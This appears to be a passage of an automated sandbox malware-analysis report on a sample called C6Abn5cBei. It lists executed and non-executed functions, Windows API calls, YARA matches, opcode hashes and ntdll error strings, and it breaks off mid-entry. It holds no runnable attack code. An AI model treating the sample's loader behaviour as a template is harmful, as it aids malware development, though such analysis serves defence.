RtlFreeHeap 90732->90733 90733->90730 90735 42be4d 90734->90735 90738 11c2c0a 90735->90738 90736 42be79 90736->90727 90739 11c2c1f LdrInitializeThunk 90738->90739 90740 11c2c11 90738->90740 90739->90736 90740->90736 90831 413b13 90832 413b2f 90831->90832 90835 42cae3 90832->90835 90836 42cafd 90835->90836 90839 11c2c70 LdrInitializeThunk 90836->90839 90837 413b35 90839->90837 90741 418e08 90742 42c843 NtClose 90741->90742 90743 418e12 90742->90743 90840 11c2b60 LdrInitializeThunk

                                                Executed Functions

                                                Function 00417833 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 131 417833-41784f 132 417857-41785c 131->132 133 417852 call 42f523 131->133 134 417862-417870 call 42fb23 132->134 135 41785e-417861 132->135 133->132 138 417880-417891 call 42dfc3 134->138 139 417872-41787d call 42fdc3 134->139 144 417893-4178a7 LdrLoadDll 138->144 145 4178aa-4178ad 138->145 139->138 144->145
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                • Instruction ID: ecafafc67528ff2c0a8c38e8f30d75d0d6e8b2cf75cf3923b583574fb7cade4a
                                                • Opcode Fuzzy Hash: f830006e6615140e8580b637796e91e8ab5f34b2beb2de568595537b0918178b
                                                • Instruction Fuzzy Hash: EF0140B1E00109B7DB10EAE1DC46FDEB3789F54308F4041A6E90897240F635EB58C755
                                                Function 0042C843 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 171 42c843-42c87f call 404883 call 42dac3 NtClose
                                                APIs
                                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C87A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                • Instruction ID: 367e2f773cb965f5ce42092994158f42d79d17829f4288edd670b8861a2249ed
                                                • Opcode Fuzzy Hash: d2ca64d7c9c952193a798ba580e50a54d6823f4a9d2982a8448f0dd46e0cb6d6
                                                • Instruction Fuzzy Hash: 1AE04F366402147BD520EB5ADC42F9B779CDFC5760F408529FA08A7241CA71B9008BA4
                                                Function 011C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 185 11c2b60-11c2b6c LdrInitializeThunk
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
                                                • Instruction ID: 1fa837aa741d1e1e33eae37a04eb7f571862644d69e7d78882d37966da9d2894
                                                • Opcode Fuzzy Hash: da173bf847d935c84a3bbf18d7cc32829601613df7c660ceb41b7bb5d719c80e
                                                • Instruction Fuzzy Hash: 5690026520241003410971584514616401A97E0201B55C021E1015590DC62589916226
                                                Function 011C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
                                                • Instruction ID: 10f5023dafbd75a6c93424c35efb9070117c1a3715903d67ebfa6f485c7db155
                                                • Opcode Fuzzy Hash: 6b454817d9cbf4caa480fdc7273c9d9e1f7015e48ed4b1df7ab72c5c17bca6b3
                                                • Instruction Fuzzy Hash: 3F90023520141413D11571584604707001997D0241F95C412E0425558DD7568A52A222
                                                Function 011C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
                                                • Instruction ID: d41869fc8749cd7b5704d2e3bca042a7fc5061ce87a51b42991f201e683db864
                                                • Opcode Fuzzy Hash: 83ca26cf003013b23479e1b4b8f545e72c28fe348ce848828effd64b07eac9cc
                                                • Instruction Fuzzy Hash: DD90023520149802D1147158850474A001597D0301F59C411E4425658DC79589917222
                                                Function 011C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
                                                • Instruction ID: d2937d0265d4de630469f33fbf60ff095eb1325efff43d668267c2e8bbe913b3
                                                • Opcode Fuzzy Hash: ee05a24cfcae0d1909b27ff0708d1370073a3aa8039f52e50b35c742aae2679d
                                                • Instruction Fuzzy Hash: 4090023560551402D10471584614706101597D0201F65C411E0425568DC7958A5166A3
                                                Function 0041400C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 7-6E2al6$7-6E2al6
                                                • API String ID: 1836367815-2814820216
                                                • Opcode ID: 5deaff572d0f5190d5fcf7c7a8d7add8a85d85076e62a73e8884596ca0f35128
                                                • Instruction ID: 8964f30d0ad93d8657fde06eb3f9f7b59b907bf4b03a41c1f31d7013d8072a87
                                                • Opcode Fuzzy Hash: 5deaff572d0f5190d5fcf7c7a8d7add8a85d85076e62a73e8884596ca0f35128
                                                • Instruction Fuzzy Hash: AA21AC72E041057AD720BBA9DC41EEFBB78EF85358F24806EFA04A7201D62D4D0387D4
                                                Function 00413FCC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 7-6E2al6$7-6E2al6
                                                • API String ID: 0-2814820216
                                                • Opcode ID: 20bc7cafbaeb1015a9a1d73b68b2eab2612c3cefdf3a28a6ffa89f637762eec3
                                                • Instruction ID: 8e92d5b971038cc737c250f2bb71b05534d94f44fe295e91c63f42aea48a0353
                                                • Opcode Fuzzy Hash: 20bc7cafbaeb1015a9a1d73b68b2eab2612c3cefdf3a28a6ffa89f637762eec3
                                                • Instruction Fuzzy Hash: 79212EB2F441187ADB10DAD5AC81DEF77BCEF85354B45416AFB08F7201D1285D428BA4
                                                Function 00414077 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 7-6E2al6$7-6E2al6
                                                • API String ID: 1836367815-2814820216
                                                • Opcode ID: acf6c40fb78e07b1d2841ef5552d34e5e95fe5b18e49d67504bdff009d2bb76e
                                                • Instruction ID: 47bcbf16f948bd2efa43fc2af02dc92d76913aba3bbe8767e293d2df0de71043
                                                • Opcode Fuzzy Hash: acf6c40fb78e07b1d2841ef5552d34e5e95fe5b18e49d67504bdff009d2bb76e
                                                • Instruction Fuzzy Hash: 7B11C272D4416C7EEB10AAE59C82DEF7B7CDF81398F44806AFA14A7240D56D4E06CBA4
                                                Function 00414083 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(7-6E2al6,00000111,00000000,00000000), ref: 004140FA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: 7-6E2al6$7-6E2al6
                                                • API String ID: 1836367815-2814820216
                                                • Opcode ID: 08fca1a0e1a0890d9208d996c0b528439d3dea7f914bf1ea09c325234879e7a1
                                                • Instruction ID: a796e303c3bda95c4014b7b5ddda5c90956674b21223f1a9010352b1be183124
                                                • Opcode Fuzzy Hash: 08fca1a0e1a0890d9208d996c0b528439d3dea7f914bf1ea09c325234879e7a1
                                                • Instruction Fuzzy Hash: 9301C4B2D0011C7ADB10AAE59C82DEF7B7CEF41398F45806AFA04A7241D6684E068BA5
                                                Function 0042CBD3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 77 42cbd3-42cc17 call 404883 call 42dac3 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CC12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: neA
                                                • API String ID: 3298025750-2757349852
                                                • Opcode ID: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                • Instruction ID: 9b298db65f8c6bf01d9dcfbfa9e7aa2d063570d1b727d24a4cf7208db5536a0f
                                                • Opcode Fuzzy Hash: 6b7aaf6b10fa7884de83b95025984858c049f17bc640bafaf4448f72ac6a3306
                                                • Instruction Fuzzy Hash: 74E06D722042147BC614EE99DC41EAB73ACEFC8714F408419FD08A7241DA70B9108BB8
                                                Function 004178B3 Relevance: 1.6, APIs: 1, Instructions: 107libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 100 4178b3-4178bc 101 417912 100->101 102 4178be-4178d1 100->102 103 417915-41791f 101->103 104 4178a9 101->104 105 4178d3-4178d9 102->105 106 417878-417891 call 42fdc3 call 42dfc3 102->106 107 417920-417922 103->107 110 4178aa-4178ad 104->110 105->107 108 4178db 105->108 106->110 122 417893-4178a7 LdrLoadDll 106->122 111 417994-41799e 107->111 112 417924-417991 107->112 108->108 114 4179a0-4179a3 111->114 115 4179a4-4179bb call 42f583 111->115 123 4179bd-4179ee call 42f583 call 42b7d3 115->123 124 4179ef-417a0f call 42b7d3 115->124 122->110
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 0b6af81593f53b888134122441e15da9a80b41db1191adf4905be041ef5e5225
                                                • Instruction ID: 5d0be4d48f966b01517bdc42c4ba4bf6190df274e0818f87784c8df01efb4060
                                                • Opcode Fuzzy Hash: 0b6af81593f53b888134122441e15da9a80b41db1191adf4905be041ef5e5225
                                                • Instruction Fuzzy Hash: 613102B5A14209ABEB10EAA8DC42FEA7378EF44304F4445AEF908D7241F635DA5487D9
                                                Function 00417826 Relevance: 1.5, APIs: 1, Instructions: 29libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 147 417826-41782b 148 417839-41785c call 42f523 147->148 149 41782e 147->149 154 417862-417870 call 42fb23 148->154 155 41785e-417861 148->155 149->148 150 417895-4178a7 LdrLoadDll 149->150 153 4178aa-4178ad 150->153 158 417880-417891 call 42dfc3 154->158 159 417872-41787d call 42fdc3 154->159 158->153 164 417893-4178a7 LdrLoadDll 158->164 159->158 164->153
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004178A5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                • Instruction ID: 3d823885dfb3bbc95cfc5e771c8059f83c63ec5343fb45df586f3dcac04713c6
                                                • Opcode Fuzzy Hash: b45236e0de41b2749b61420101eba8697db62a92501e24b2d435ca03036e404e
                                                • Instruction Fuzzy Hash: E8E05530D0C18977CB10DAB459091D8FBB0CF52208F0046EFD89C57143E1344958C342
                                                Function 0042CB83 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 166 42cb83-42cbc7 call 404883 call 42dac3 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E63E,?,?,00000000,?,0041E63E,?,?,?), ref: 0042CBC2
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                • Instruction ID: 477c5da0d8b10c1a74d97be33d87d72f42d7e0c6ee917c77eecc1667abc34b4e
                                                • Opcode Fuzzy Hash: c199910dec673787d95a21cb01d41e7f8052bbdc866d705f02d42feb43950ea4
                                                • Instruction Fuzzy Hash: D6E06DB22042187BD614EF59EC41EEB33ADEFC5710F404419FD08A7242CA70B9118BB9
                                                Function 0042CC23 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 176 42cc23-42cc5f call 404883 call 42dac3 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,00000000,?,41319B85,?,?,41319B85), ref: 0042CC5A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1874122744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_400000_C6Abn5cBei.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 41715c15822ad2d6df214d347bab8e0ea5d94cc086f80d85ed167616973f667e
                                                • Instruction ID: 99e8a95ecd3e46a4e8bc2f157e670209696b5ed5efda78eaef95c9c94b2a8784
                                                • Opcode Fuzzy Hash: 41715c15822ad2d6df214d347bab8e0ea5d94cc086f80d85ed167616973f667e
                                                • Instruction Fuzzy Hash: FEE04F766403547BC620BB5ADC41FD777ADDFC5764F008429FA4867181C6B1790087F4
                                                Function 011C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 181 11c2c0a-11c2c0f 182 11c2c1f-11c2c26 LdrInitializeThunk 181->182 183 11c2c11-11c2c18 181->183
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
                                                • Instruction ID: bdc0dbe846a975e7cebff4f6a6507c02b87ab3cb998b1761fa62cbb6fbe56fa1
                                                • Opcode Fuzzy Hash: 62599f371aa306ec3fab32d35960573db7fd628a6b0a69ceafc273b19a8874c4
                                                • Instruction Fuzzy Hash: 0AB09B719015D5C6DA15E7A44708717791077D0701F25C065D2030641F4738C1D1E276

                                                Non-executed Functions

                                                Function 01238D10 Relevance: 37.8, Strings: 30, Instructions: 268COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Strings
                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 01238E02
                                                • *** An Access Violation occurred in %ws:%s, xrefs: 01238F3F
                                                • *** enter .cxr %p for the context, xrefs: 01238FBD
                                                • <unknown>, xrefs: 01238D2E, 01238D81, 01238E00, 01238E49, 01238EC7, 01238F3E
                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01238DC4
                                                • Go determine why that thread has not released the critical section., xrefs: 01238E75
                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01238FEF
                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01238DB5
                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01238E3F
                                                • The instruction at %p tried to %s , xrefs: 01238F66
                                                • *** then kb to get the faulting stack, xrefs: 01238FCC
                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 01238E4B
                                                • a NULL pointer, xrefs: 01238F90
                                                • *** Inpage error in %ws:%s, xrefs: 01238EC8
                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 01238D8C
                                                • write to, xrefs: 01238F56
                                                • an invalid address, %p, xrefs: 01238F7F
                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01238E86
                                                • The instruction at %p referenced memory at %p., xrefs: 01238EE2
                                                • The resource is owned shared by %d threads, xrefs: 01238E2E
                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01238F34
                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01238F26
                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01238DD3
                                                • read from, xrefs: 01238F5D, 01238F62
                                                • The critical section is owned by thread %p., xrefs: 01238E69
                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01238F2D
                                                • This failed because of error %Ix., xrefs: 01238EF6
                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01238DA3
                                                • *** enter .exr %p for the exception record, xrefs: 01238FA1
                                                • The resource is owned exclusively by thread %p, xrefs: 01238E24
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                • API String ID: 0-108210295
                                                • Opcode ID: f0ba720239cb675e0bfa2fbe36ead5a582778ec7c89355d718b57d93918965e1
                                                • Instruction ID: d45806d81af48933475dd054fc96b11d3ed0d1050c8d4b11479209be52b04f18
                                                • Opcode Fuzzy Hash: f0ba720239cb675e0bfa2fbe36ead5a582778ec7c89355d718b57d93918965e1
                                                • Instruction Fuzzy Hash: 2C8119B5A74215BFDB2AAB19CC4AE7B3F35EF96B10F050248F6046F252E3B58401D762
                                                Function 01202349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2160512332
                                                • Opcode ID: 78e824d5d890c98b89902fe01609bd59c407723a1a4b43221ffc4944ba396ad8
                                                • Instruction ID: 4288efe51a4ab1cf5b4f4699db283d14c95145db6c2e810db40776e5ff77928e
                                                • Opcode Fuzzy Hash: 78e824d5d890c98b89902fe01609bd59c407723a1a4b43221ffc4944ba396ad8
                                                • Instruction Fuzzy Hash: F6929271624742DFE726CF18C888B6BB7E8BB84754F044A1EFA94D7292D770E844CB52
                                                Function 011B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                Download Yara Rule
                                                Strings
                                                • undeleted critical section in freed memory, xrefs: 011F542B
                                                • Thread identifier, xrefs: 011F553A
                                                • Critical section address., xrefs: 011F5502
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F540A, 011F5496, 011F5519
                                                • Address of the debug info found in the active list., xrefs: 011F54AE, 011F54FA
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 011F5543
                                                • Invalid debug info address of this critical section, xrefs: 011F54B6
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F54CE
                                                • Critical section address, xrefs: 011F5425, 011F54BC, 011F5534
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 011F54E2
                                                • Critical section debug info address, xrefs: 011F541F, 011F552E
                                                • 8, xrefs: 011F52E3
                                                • double initialized or corrupted critical section, xrefs: 011F5508
                                                • corrupted critical section, xrefs: 011F54C2
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: b710a75f5975da9e31b7cf18edc57cc56a0d510a6f906fc4e757db5f5e07bd29
                                                • Instruction ID: 29b2189cfa84ca2e4f9fc4bf9223d312ae7c79eba3feea08400c8cd58e7234b1
                                                • Opcode Fuzzy Hash: b710a75f5975da9e31b7cf18edc57cc56a0d510a6f906fc4e757db5f5e07bd29
                                                • Instruction Fuzzy Hash: 2381ADB1A40359EFDB68CF99C845BAEBBBAFB48B14F20411DF604B7650D371A941CB60
                                                Function 011B29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 011F2602
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 011F2506
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 011F24C0
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 011F2498
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 011F2624
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 011F2412
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 011F2409
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 011F25EB
                                                • @, xrefs: 011F259B
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 011F22E4
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 011F261F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
